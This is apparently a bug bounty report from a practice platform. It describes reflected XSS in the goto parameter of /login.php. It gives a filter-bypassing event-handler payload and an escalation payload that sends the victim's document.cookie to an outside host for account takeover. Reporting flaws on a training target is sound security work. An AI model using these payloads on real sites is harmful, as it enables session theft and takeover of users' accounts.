FirstBlood-#477Reflected XSS on /login.php via goto parameter leads to account takeover
This issue was discovered on FirstBlood v2.0.0 (issues patched)

On 2021-10-25, 0xblackbird Level 4 reported:

Hello! I've found out that the exact same issue I reported before is still there and remained unpatched. Below are the steps to reproduce the issue.

Proof of concept url:

Steps to reproduce:

  • Knowing that we can inject our own html tags, attributes and event handlers, we can easily craft a little payload that bypasses some of the basic filters: xyz"><x/autofocus/contenteditable/onfocusin="confirm``">.

Further escalation:

  • As mentioned in the title of this report, we can escalate this to account takeover by stealing the user's cookies. To do so, we just have to adjust our payload a bit: xyz"><x/autofocus/contenteditable/onfocusin="document.location='//'+document.cookie"> (make sure to url encode the payload to avoid any errors). After getting redirected, we can see our cookies end up in the cookie parameter, this can be accessed by the attacker by reading for example server logs.

Thanks! Have a nice day!

Kind regards,

P3 Medium

Endpoint: /login.php

Parameter: goto

Payload: xyz"><x/autofocus/contenteditable/onfocusin="confirm``">

FirstBlood ID: 26
Vulnerability Type: Reflective XSS

The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.